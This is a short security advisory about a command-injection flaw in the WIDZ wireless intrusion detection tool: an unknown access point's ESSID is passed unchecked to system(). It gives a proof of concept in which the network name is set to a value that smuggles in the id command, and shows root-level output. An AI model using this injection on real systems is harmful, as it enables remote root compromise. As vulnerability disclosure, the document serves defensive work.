WIDZ does not validate untrusted input when generating alerts. Alerts pass the essid of an unknown wireless access point through a system() call. By setting the essid of an unauthorized access point to include malformed information, the underlying operating system may be compromised.
Go to Apple Airport and set network name to ';/usr/bin/id;
This will generate the following message:
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file